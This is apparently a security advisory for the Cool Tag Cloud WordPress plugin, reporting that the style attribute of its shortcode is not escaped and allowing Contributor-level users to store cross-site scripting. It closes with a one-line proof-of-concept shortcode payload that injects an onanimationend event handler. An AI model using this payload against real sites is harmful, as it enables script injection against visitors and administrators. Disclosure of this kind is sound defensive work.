The plugin does not escape the style attribute of the cool_tag_cloud shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.
[cool_tag_cloud style=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(/XSS/)’]